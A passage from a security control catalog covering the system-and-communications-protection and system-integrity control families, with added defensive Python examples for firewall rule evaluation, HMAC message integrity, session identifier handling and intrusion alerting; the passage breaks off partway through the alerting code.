    Baselines: X | NSS Stand-Alone: not marked | NSS Network: not marked | Priority: not marked
    The organization requires that the information system meets [Assignment: organization-defined level of trustworthiness].
SC-1  System And Communications Protection Policy And Procedures
    Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented system and communications protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the system and communications protection policy and associated system and communications protection controls.

SC-2  Application Partitioning
    Baselines: X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The information system separates user functionality (including user interface services) from information system management functionality.

SC-2(1)  Application Partitioning
    Baselines: X X X X X X | NSS Stand-Alone: not marked | NSS Network: not marked | Priority: not marked
    The information system prevents the presentation of information system management-related functionality at an interface for general (i.e., non-privileged) users.

SC-3  Security Function Isolation
    Baselines: X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The information system isolates security functions from nonsecurity functions.

SC-4  Information In Shared Resources
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system prevents unauthorized and unintended information transfer via shared system resources.

SC-5  Denial Of Service Protection
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system protects against or limits the effects of the following types of denial of service attacks: [Assignment: organization-defined list of types of denial of service attacks or reference to source for current list].

SC-5(1)  Denial Of Service Protection
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system restricts the ability of users to launch denial of service attacks against other information systems or networks.

SC-5(2)  Denial Of Service Protection
    Baselines: X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system manages excess capacity, bandwidth, or other redundancy to limit the effects of information flooding types of denial of service attacks.
SC-6  Resource Priority
    Baselines: X | NSS Stand-Alone: No | NSS Network: No | Priority: P0
    The information system limits the use of resources by priority.

SC-7  Boundary Protection
    Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system: a) Monitors and controls communications at the external boundary of the system and at key internal boundaries within the system; and b) Connects to external networks or information systems only through managed interfaces consisting of boundary protection devices arranged in accordance with an organizational security architecture.

SC-7(1)  Boundary Protection
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization physically allocates publicly accessible information system components to separate subnetworks with separate physical network interfaces.

SC-7(2)  Boundary Protection
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system prevents public access into the organization's internal networks except as appropriately mediated by managed interfaces employing boundary protection devices.

SC-7(3)  Boundary Protection
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization limits the number of access points to the information system to allow for more comprehensive monitoring of inbound and outbound communications and network traffic.

SC-7(4)  Boundary Protection
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization: a) Implements a managed interface for each external telecommunication service; b) Establishes a traffic flow policy for each managed interface; c) Employs security controls as needed to protect the confidentiality and integrity of the information being transmitted; d) Documents each exception to the traffic flow policy with a supporting mission/business need and duration of that need; e) Reviews exceptions to the traffic flow policy [Assignment: organization-defined frequency]; and f) Removes traffic flow policy exceptions that are no longer supported by an explicit mission/business need.
SC-7(5)  Boundary Protection
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system, at managed interfaces, denies network traffic by default and allows network traffic by exception (i.e., deny all, permit by exception).

SC-7(6)  Boundary Protection
    Baselines: X | NSS Stand-Alone: not marked | NSS Network: not marked | Priority: not marked
    The organization prevents the unauthorized release of information outside of the information system boundary or any unauthorized communication through the information system boundary when there is an operational failure of the boundary protection mechanisms.

SC-7(7)  Boundary Protection
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system prevents remote devices that have established a non-remote connection with the system from communicating outside of that communications path with resources in external networks.

SC-7(8)  Boundary Protection
    Baselines: X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system routes [Assignment: organization-defined internal communications traffic] to [Assignment: organization-defined external networks] through authenticated proxy servers within the managed interfaces of boundary protection devices.

SC-7(11)  Boundary Protection
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system checks incoming communications to ensure that the communications are coming from an authorized source and routed to an authorized destination.
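SC-7(5) (deny all, permit by exception) and SC-7(11) (authorized source and destination) describe the evaluation a managed interface performs on each inbound flow. The following is an added example of that evaluation in code and is not part of the RMAIP or of any vendor's product: a flow is permitted only if some explicit rule matches its source, destination, protocol and destination port, and everything else falls through to deny. The rule format, the two-rule policy, the exception comments and the sample flows (drawn from the TEST-NET documentation ranges) are constructed for illustration.

```python
"""Deny-all, permit-by-exception evaluation at a managed interface
(SC-7(5)) with source/destination authorization (SC-7(11)).
Added example; policy and sample flows are constructed."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

Net = ipaddress.IPv4Network   # IPv4 only, to keep the example short


@dataclass(frozen=True)
class Flow:
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    proto: str
    dport: int


@dataclass(frozen=True)
class Rule:
    src: Net
    dst: Net
    proto: str                 # "tcp" or "udp"
    dports: Tuple[int, int]    # inclusive destination-port range
    comment: str               # the documented need behind the exception (SC-7(4)(d))

    def matches(self, flow: Flow) -> bool:
        return (
            flow.proto == self.proto
            and flow.src in self.src
            and flow.dst in self.dst
            and self.dports[0] <= flow.dport <= self.dports[1]
        )


def parse_flow(line: str) -> Flow:
    """Parse 'src dst proto dport', e.g. '203.0.113.7 192.0.2.10 tcp 443'."""
    s, d, p, port = line.split()
    return Flow(ipaddress.ip_address(s), ipaddress.ip_address(d), p.lower(), int(port))


def evaluate(rules: List[Rule], flow: Flow) -> Tuple[str, Optional[str]]:
    """First matching permit rule wins. No rule matched means deny: there is
    no catch-all permit and the default is never consulted as a rule."""
    for rule in rules:
        if rule.matches(flow):
            return "permit", rule.comment
    return "deny", None


# Constructed policy: HTTPS from anywhere to the public web tier, and DNS
# from one partner range to one resolver. Nothing else is permitted inbound.
POLICY = [
    Rule(Net("0.0.0.0/0"), Net("192.0.2.0/28"), "tcp", (443, 443), "public web tier, exception 1"),
    Rule(Net("198.51.100.0/24"), Net("192.0.2.53/32"), "udp", (53, 53), "partner DNS, exception 2"),
]

# Constructed sample flows, one per line.
SAMPLE_FLOWS = """\
203.0.113.7 192.0.2.10 tcp 443
203.0.113.7 192.0.2.10 tcp 22
198.51.100.9 192.0.2.53 udp 53
203.0.113.9 192.0.2.53 udp 53
198.51.100.9 192.0.2.99 udp 53
"""


def run(policy: List[Rule] = POLICY, flows_text: str = SAMPLE_FLOWS) -> List[Tuple[str, str]]:
    """Evaluate each flow line; returns [(flow line, verdict), ...]."""
    return [(line, evaluate(policy, parse_flow(line))[0]) for line in flows_text.strip().splitlines()]


if __name__ == "__main__":
    for line, verdict in run():
        print(f"{verdict:6s} {line}")
```

The fourth and fifth sample flows are the SC-7(11) cases: the same service and port as a permitted flow, but from an unauthorized source or to an unauthorized destination, and both are denied. Each rule carries the documented need that justifies it, which is what the SC-7(4) review of exceptions has to check against.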
SC-7(12)  Boundary Protection
    Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system implements host-based boundary protection mechanisms for servers, workstations, and mobile devices.

SC-7(13)  Boundary Protection
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization isolates [Assignment: organization-defined key information security tools, mechanisms, and support components] from other internal information system components via physically separate subnets with managed interfaces to other portions of the system.
SC-7(14)  Boundary Protection
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization protects against unauthorized physical connections across the boundary protections implemented at [Assignment: organization-defined list of managed interfaces].

SC-7(18)  Boundary Protection
    Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system fails securely in the event of an operational failure of a boundary protection device.

SC-8  Transmission Integrity
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system protects the integrity of transmitted information.

SC-8(1)  Transmission Integrity
    Baselines: X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures.
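SC-8(1) calls for a cryptographic mechanism that lets the receiver recognize changes made in transit. The block below is an added example of the minimal such mechanism, a keyed message authentication code over each frame, and is not part of the RMAIP or of any protocol the document names. The frame layout (4-byte sequence number, 4-byte length, payload, 32-byte HMAC-SHA256 tag), the shared key and the sample message are constructed for illustration; in a deployment the key would come from the SC-12 key management process and the module would have to meet SC-13, which this example does not demonstrate.

```python
"""Detect modification, truncation and replay of transmitted frames with
HMAC-SHA256 (SC-8(1)). Added example; framing and key are constructed."""
import hashlib
import hmac
import os
import struct
from typing import Optional

TAG_LEN = 32   # HMAC-SHA256 output length
HDR_LEN = 8    # seq (4) + length (4), big-endian


def seal(key: bytes, seq: int, payload: bytes) -> bytes:
    """Frame = seq | len | payload | tag. The tag covers the header too, so
    reordering or replaying a frame is detected as well as changing its body."""
    header = struct.pack(">II", seq, len(payload))
    tag = hmac.new(key, header + payload, hashlib.sha256).digest()
    return header + payload + tag


def open_frame(key: bytes, frame: bytes, expected_seq: int) -> Optional[bytes]:
    """Return the payload if the frame is intact and in sequence, else None.
    Every failure returns the same value so the peer learns nothing about
    which check failed."""
    if len(frame) < HDR_LEN + TAG_LEN:
        return None
    seq, length = struct.unpack(">II", frame[:HDR_LEN])
    if len(frame) != HDR_LEN + length + TAG_LEN:
        return None
    body, tag = frame[: HDR_LEN + length], frame[HDR_LEN + length:]
    # Verify before touching the payload; compare_digest is constant-time.
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).digest(), tag):
        return None
    if seq != expected_seq:
        return None
    return frame[HDR_LEN: HDR_LEN + length]


def demo() -> dict:
    """Constructed exchange: one valid frame, then three manipulated deliveries."""
    key = os.urandom(32)
    msg = b"TRANSFER 100 TO ACCT 42"
    frame = seal(key, 1, msg)
    results = {"intact": open_frame(key, frame, 1)}
    # Flip one bit in the payload ('42' becomes '52'): the tag no longer verifies.
    tampered = bytearray(frame)
    tampered[HDR_LEN + msg.index(b"42")] ^= 0x01
    results["tampered"] = open_frame(key, bytes(tampered), 1)
    # Replay the valid frame later in the stream: sequence check rejects it.
    results["replayed"] = open_frame(key, frame, 2)
    # Frame from a peer holding a different key.
    results["wrong_key"] = open_frame(os.urandom(32), frame, 1)
    return results


if __name__ == "__main__":
    print(demo())
```

The MAC gives integrity and origin authentication only; SC-9(1) confidentiality is a separate requirement and is not provided here. In practice both come from an authenticated encryption mode or from a transport such as TLS, but the verify-then-use ordering and the constant-time comparison shown here are the properties to look for in whatever is deployed.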
SC-8(2)  Transmission Integrity
    Baselines: X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system maintains the integrity of information during aggregation, packaging, and transformation in preparation for transmission.

SC-9  Transmission Confidentiality
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system protects the confidentiality of transmitted information.

SC-9(1)  Transmission Confidentiality
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization employs cryptographic mechanisms to prevent unauthorized disclosure of information during transmission unless otherwise protected by [Assignment: organization-defined alternative physical measures].

SC-9(2)  Transmission Confidentiality
    Baselines: X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system maintains the confidentiality of information during aggregation, packaging, and transformation in preparation for transmission.

SC-10  Network Disconnect
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P2
    The information system terminates the network connection associated with a communications session at the end of the session or after [Assignment: organization-defined time period] of inactivity.
SC-11  Trusted Path
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P0
    The information system establishes a trusted communications path between the user and the following security functions of the system: [Assignment: organization-defined security functions to include at a minimum, information system authentication and reauthentication].

SC-12  Cryptographic Key Establishment And Management
    Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization establishes and manages cryptographic keys for required cryptography employed within the information system.

SC-12(1)  Cryptographic Key Establishment And Management
    Baselines: X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization maintains availability of information in the event of the loss of cryptographic keys by users.

SC-13  Use Of Cryptography
    Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The information system implements required cryptographic protections using cryptographic modules that comply with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance.

SC-13(4)  Use Of Cryptography
    Baselines: X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization employs [Selection: FIPS-validated; NSA-approved] cryptography to implement digital signatures.

SC-14  Public Access Protections
    Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system protects the integrity and availability of publicly available information and applications.

SC-15  Collaborative Computing Devices
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system: a) Prohibits remote activation of collaborative computing devices with the following exceptions: [Assignment: organization-defined exceptions where remote activation is to be allowed]; and b) Provides an explicit indication of use to users physically present at the devices.

SC-15(1)  Collaborative Computing Devices
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system provides physical disconnect of collaborative computing devices in a manner that supports ease of use.

SC-15(2)  Collaborative Computing Devices
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system or supporting environment blocks both inbound and outbound traffic between instant messaging clients that are independently configured by end users and external service providers.
SC-15(3)  Collaborative Computing Devices
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The organization disables or removes collaborative computing devices from information systems in [Assignment: organization-defined secure work areas].

SC-17  Public Key Infrastructure Certificates
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization issues public key certificates under an [Assignment: organization-defined certificate policy] or obtains public key certificates under an appropriate certificate policy from an approved service provider.

SC-18  Mobile Code
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The organization: a) Defines acceptable and unacceptable mobile code and mobile code technologies; b) Establishes usage restrictions and implementation guidance for acceptable mobile code and mobile code technologies; and c) Authorizes, monitors, and controls the use of mobile code within the information system.

SC-18(1)  Mobile Code
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system implements detection and inspection mechanisms to identify unauthorized mobile code and takes corrective actions, when necessary.

SC-18(2)  Mobile Code
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The organization ensures the acquisition, development, and/or use of mobile code to be deployed in information systems meets [Assignment: organization-defined mobile code requirements].

SC-18(3)  Mobile Code
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system prevents the download and execution of prohibited mobile code.

SC-18(4)  Mobile Code
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system prevents the automatic execution of mobile code in [Assignment: organization-defined software applications] and requires [Assignment: organization-defined actions] prior to executing the code.
SC-19  Voice Over Internet Protocol
    Baselines: X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization: a) Establishes usage restrictions and implementation guidance for Voice over Internet Protocol (VoIP) technologies based on the potential to cause damage to the information system if used maliciously; and b) Authorizes, monitors, and controls the use of VoIP within the information system.

SC-20  Secure Name/Address Resolution Service (Authoritative Source)
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system provides additional data origin and integrity artifacts along with the authoritative data the system returns in response to name/address resolution queries.

SC-20(1)  Secure Name/Address Resolution Service (Authoritative Source)
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The information system, when operating as part of a distributed, hierarchical namespace, provides the means to indicate the security status of child subspaces and (if the child supports secure resolution services) enable verification of a chain of trust among parent and child domains.

SC-21  Secure Name/Address Resolution Service (Recursive Or Caching Resolver)
    Baselines: X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system performs data origin authentication and data integrity verification on the name/address resolution responses the system receives from authoritative sources when requested by client systems.

SC-21(1)  Secure Name/Address Resolution Service (Recursive Or Caching Resolver)
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system performs data origin authentication and data integrity verification on all resolution responses whether or not local clients explicitly request this service.

SC-22  Architecture And Provisioning For Name/Address Resolution Service
    Baselines: X X X X X X X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information systems that collectively provide name/address resolution service for an organization are fault-tolerant and implement internal/external role separation.

SC-23  Session Authenticity
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system provides mechanisms to protect the authenticity of communications sessions.

SC-23(1)  Session Authenticity
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system invalidates session identifiers upon user logout or other session termination.
SC-23(2)  Session Authenticity
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system provides a readily observable logout capability whenever authentication is used to gain access to web pages.

SC-23(3)  Session Authenticity
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system generates a unique session identifier for each session and recognizes only session identifiers that are system-generated.

SC-23(4)  Session Authenticity
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The information system generates unique session identifiers with [Assignment: organization-defined randomness requirements].
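SC-23(1), SC-23(3) and SC-23(4) together define the lifecycle of a session identifier: generated by the system with a stated randomness requirement, recognized only if the system issued it, and invalidated on logout or other termination. The block below is an added example of a server-side session store that meets those three statements and is not part of the RMAIP or of any framework the document names. The 128-bit entropy figure and the 900-second idle timeout stand in for the organization-defined values and are assumptions; the user names and the injected clock are constructed for the demonstration.

```python
"""Session identifier lifecycle for SC-23(1), (3) and (4).
Added example; entropy and timeout values are assumed, not from the RMAIP."""
import secrets
import time
from typing import Callable, Dict, Optional

ID_BYTES = 16                                  # 128 bits from the OS CSPRNG (assumed requirement)
ID_LEN = len(secrets.token_urlsafe(ID_BYTES))  # 22 url-safe characters for 16 bytes
IDLE_TIMEOUT = 900.0                           # seconds of inactivity before termination (assumed)


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.monotonic):
        self._clock = clock
        self._sessions: Dict[str, dict] = {}

    def create(self, user: str) -> str:
        """SC-23(3)/(4): identifiers are minted here and nowhere else, from a
        CSPRNG, so they are unique and unpredictable. A client never supplies one."""
        sid = secrets.token_urlsafe(ID_BYTES)
        self._sessions[sid] = {"user": user, "last_seen": self._clock()}
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """Return the user for a live, system-issued identifier; None otherwise.
        A value the server never issued (an attacker-chosen id, as in session
        fixation) is simply unknown. With 128-bit random ids the dictionary
        lookup's timing tells a guesser nothing useful."""
        if not isinstance(sid, str) or len(sid) != ID_LEN:
            return None
        record = self._sessions.get(sid)
        if record is None:
            return None
        now = self._clock()
        if now - record["last_seen"] > IDLE_TIMEOUT:
            self._sessions.pop(sid, None)      # expiry is a termination: invalidate (SC-23(1))
            return None
        record["last_seen"] = now
        return record["user"]

    def logout(self, sid: str) -> None:
        """SC-23(1): discard the identifier server-side. A client that keeps
        presenting it is treated like any unknown value."""
        self._sessions.pop(sid, None)


def demo() -> dict:
    """Constructed walk-through with an injected clock so expiry is deterministic."""
    t = [1000.0]
    store = SessionStore(clock=lambda: t[0])
    sid = store.create("alice")
    out = {"fresh": store.lookup(sid)}
    out["forged"] = store.lookup("A" * ID_LEN)          # right shape, never issued
    out["fixation"] = store.lookup("attacker-chosen-id")
    t[0] += IDLE_TIMEOUT + 1
    out["expired"] = store.lookup(sid)
    sid2 = store.create("alice")
    store.logout(sid2)
    out["after_logout"] = store.lookup(sid2)
    out["unique"] = len({store.create("bob") for _ in range(1000)}) == 1000
    return out


if __name__ == "__main__":
    print(demo())
```

Two points carry over to any real implementation: the identifier must be regenerated on authentication (a pre-login id accepted after login is the session fixation case the "recognizes only system-generated identifiers" wording rules out), and logout has to remove the server-side record, not just clear the client's cookie, or SC-23(1) is not met.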
SC-24  Fail In Known State
    Baselines: X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The information system fails to a [Assignment: organization-defined known-state] for [Assignment: organization-defined types of failures] preserving [Assignment: organization-defined system state information] in failure.

SC-28  Protection Of Information At Rest
    Baselines: X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The information system protects the confidentiality and integrity of information at rest.

SC-28(1)  Protection Of Information At Rest
    Baselines: X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization employs cryptographic mechanisms to prevent unauthorized disclosure and modification of information at rest unless otherwise protected by alternative physical measures.

SC-32  Information System Partitioning
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P0
    The organization partitions the information system into components residing in separate physical domains (or environments) as deemed necessary.

SC-33  Transmission Preparation Integrity
    Baselines: X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P0
    The information system protects the integrity of information during the processes of data aggregation, packaging, and transformation in preparation for transmission.
SI-1  System And Information Integrity Policy And Procedures
    Baselines: X X X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented system and information integrity policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the system and information integrity policy and associated system and information integrity controls.

SI-2  Flaw Remediation
    Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization: a) Identifies, reports, and corrects information system flaws; b) Tests software updates related to flaw remediation for effectiveness and potential side effects on organizational information systems before installation; and c) Incorporates flaw remediation into the organizational configuration management process.

SI-2(1)  Flaw Remediation
    Baselines: X | NSS Stand-Alone: not marked | NSS Network: not marked | Priority: not marked
    The organization centrally manages the flaw remediation process and installs software updates automatically.

SI-2(2)  Flaw Remediation
    Baselines: X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization employs automated mechanisms [Assignment: organization-defined frequency] to determine the state of information system components with regard to flaw remediation.

SI-2(3)  Flaw Remediation
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The organization measures the time between flaw identification and flaw remediation, comparing with [Assignment: organization-defined benchmarks].

SI-2(4)  Flaw Remediation
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The organization employs automated patch management tools to facilitate flaw remediation to [Assignment: organization-defined information system components].
SI-3Malicious Code
ProtectionX X X X X X No No P1
The organization: a) Employsmalicious code protectionmechanisms at informationsystem entry and exit pointsand at workstations, servers,or mobile computing deviceson the network to detect anderadicate malicious code: 1)Transported by electronicmail, electronic mailattachments, web accesses,removable media, or othercommon means; or 2)Inserted through theexploitation of informationsystem vulnerabilities; b)Updates malicious codeprotection mechanisms(including signaturedefinitions) whenever newreleases are available inaccordance withorganizational configurationmanagement policy andprocedures; c) Configuresmalicious code protectionmechanisms to: 1) - Performperiodic scans of theinformation system[Assignment: organization-defined frequency] and real-time scans of files fromexternal sources as the filesare downloaded, opened, orexecuted in accordance withorganizational securitypolicy; and 2) [Selection(one or more): blockmalicious code; quarantinemalicious code; send alertto administrator;[Assignment: organization-defined action]] in responseto malicious code detection;and d) Addresses the receiptof false positives duringmalicious code detectionand eradication and theresulting potential impact onthe availability of theinformation system.
SI-3(1) Malicious Code Protection X X X X X No No P1
The organization centrally manages malicious code protection mechanisms.
SI-3(2) Malicious Code Protection X X X X X No No P1
The information system automatically updates malicious code protection mechanisms (including signature definitions).
SI-3(3) Malicious Code Protection X X X X X No No P1
The information system prevents non-privileged users from circumventing malicious code protection capabilities.
SI-4 Information System Monitoring X X X X X No Yes P1
The organization: a) Monitors events on the information system in accordance with [Assignment: organization-defined monitoring objectives] and detects information system attacks; b) Identifies unauthorized use of the information system; c) Deploys monitoring devices: (i) strategically within the information system to collect organization-determined essential information; and (ii) at ad hoc locations within the system to track specific types of transactions of interest to the organization; d) Heightens the level of information system monitoring activity whenever there is an indication of increased risk to organizational operations and assets, individuals, other organizations, or the Nation based on law enforcement information, intelligence information, or other credible sources of information; and e) Obtains legal opinion with regard to information system monitoring activities in accordance with applicable federal laws, Executive Orders, directives, policies, or regulations.
SI-4(1) Information System Monitoring X X X No No P1
The organization interconnects and configures individual intrusion detection tools into a system-wide intrusion detection system using common protocols.
SI-4(2) Information System Monitoring X X X X X No No P1
The organization employs automated tools to support near real-time analysis of events.
SI-4(4) Information System Monitoring X X X X X X X X No No P1
The information system monitors inbound and outbound communications for unusual or unauthorized activities or conditions.
SI-4(5) Information System Monitoring X X X X X No No P1
The information system provides near real-time alerts when the following indications of compromise or potential compromise occur: [Assignment: organization-defined list of compromise indicators].
SI-4(6) Information System Monitoring X X X X X No No P1
The information system prevents non-privileged users from circumventing intrusion detection and prevention capabilities.
SI-4(7) Information System Monitoring X X X X X X No Yes P1
The information system notifies [Assignment: organization-defined list of incident response personnel (identified by name and/or by role)] of suspicious events and takes [Assignment: organization-defined list of least-disruptive actions to terminate suspicious events].
SI-4(8) Information System Monitoring X X X X X X X X X No No P1
The organization protects information obtained from intrusion-monitoring tools from unauthorized access, modification, and deletion.
SI-4(9) Information System Monitoring X X X No Yes P1
The organization tests/exercises intrusion-monitoring tools [Assignment: organization-defined time-period].
SI-4(11) Information System Monitoring X X X No No P1
The organization analyzes outbound communications traffic at the external boundary of the system (i.e., system perimeter) and, as deemed necessary, at selected interior points within the system (e.g., subnets, subsystems) to discover anomalies.
SI-4(12) Information System Monitoring X X X X X X No Yes P1
The organization employs automated mechanisms to alert security personnel of the following inappropriate or unusual activities with security implications: [Assignment: organization-defined list of inappropriate or unusual activities that trigger alerts].
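SI-4(5) and SI-4(12) both leave the indicator list to the organization; what the control actually demands is that the list be evaluated against events as they arrive and that a named person gets an alert. The following is an added illustration, not part of the RMAIP or any DOE tool: a small streaming monitor that applies three assumed indicators (repeated authentication failures within a window, a successful login right after such a burst, and outbound traffic to a blocklisted address or an unusual port) to constructed sample log lines. The event format, thresholds, blocklist and port list are all assumptions chosen for the example.

```python
"""SI-4(5)/SI-4(12)-style alerting: apply an organization-defined indicator list
to a stream of events and raise an alert as soon as an indicator fires.
Added example; log format, thresholds and lists below are assumptions."""
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample events (not real logs): "<ISO time> <host> <type> key=value ..."
SAMPLE_EVENTS = """\
2024-03-01T10:00:01 ws17 auth result=fail user=jsmith src=10.0.5.23
2024-03-01T10:00:04 ws17 auth result=fail user=jsmith src=10.0.5.23
2024-03-01T10:00:07 ws17 auth result=fail user=jsmith src=10.0.5.23
2024-03-01T10:00:09 ws17 auth result=fail user=jsmith src=10.0.5.23
2024-03-01T10:00:12 ws17 auth result=fail user=jsmith src=10.0.5.23
2024-03-01T10:00:15 ws17 auth result=ok user=jsmith src=10.0.5.23
2024-03-01T10:02:00 srv03 net dir=out dst=203.0.113.77 dport=443
2024-03-01T10:03:00 srv03 net dir=out dst=198.51.100.9 dport=6667
2024-03-01T10:05:00 ws02 auth result=fail user=admin src=10.0.9.4
"""

# Organization-defined indicator parameters (assumed values for this example).
FAILED_LOGIN_THRESHOLD = 5
FAILED_LOGIN_WINDOW_S = 60
BLOCKED_DESTINATIONS = {"198.51.100.9"}   # constructed "known bad" address
UNUSUAL_PORTS = {6667}                     # assumed list of ports not expected outbound

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+)(.*)$")


@dataclass
class Alert:
    indicator: str
    host: str
    time: datetime
    detail: str


@dataclass
class Monitor:
    # per (host, source) sliding window of failure timestamps
    fail_hist: dict = field(default_factory=lambda: defaultdict(deque))
    recently_bruteforced: set = field(default_factory=set)
    alerts: list = field(default_factory=list)

    def _alert(self, indicator: str, host: str, t: datetime, detail: str) -> None:
        # In a deployment this is where SI-4(7)'s named personnel would be notified.
        self.alerts.append(Alert(indicator, host, t, detail))

    def feed(self, line: str) -> None:
        """Process one event immediately (near real-time) rather than in batches."""
        m = LINE_RE.match(line.strip())
        if not m:
            return
        t = datetime.fromisoformat(m.group(1))
        host, kind = m.group(2), m.group(3)
        kv = dict(p.split("=", 1) for p in m.group(4).split())
        if kind == "auth":
            self._auth(host, t, kv)
        elif kind == "net":
            self._net(host, t, kv)

    def _auth(self, host: str, t: datetime, kv: dict) -> None:
        key = (host, kv["src"])
        if kv["result"] == "fail":
            hist = self.fail_hist[key]
            hist.append(t)
            # drop failures that fell out of the window
            while hist and (t - hist[0]).total_seconds() > FAILED_LOGIN_WINDOW_S:
                hist.popleft()
            if len(hist) == FAILED_LOGIN_THRESHOLD:   # fire once when threshold is reached
                self.recently_bruteforced.add(key)
                self._alert("brute-force", host, t,
                            f"{len(hist)} failures from {kv['src']} in {FAILED_LOGIN_WINDOW_S}s")
        elif kv["result"] == "ok" and key in self.recently_bruteforced:
            # a success on the heels of a burst is the higher-severity indicator
            self.recently_bruteforced.discard(key)
            self._alert("success-after-brute-force", host, t,
                        f"user {kv['user']} from {kv['src']}")

    def _net(self, host: str, t: datetime, kv: dict) -> None:
        if kv.get("dir") != "out":
            return
        if kv["dst"] in BLOCKED_DESTINATIONS:
            self._alert("blocked-destination", host, t,
                        f"outbound to {kv['dst']}:{kv['dport']} (blocklisted)")
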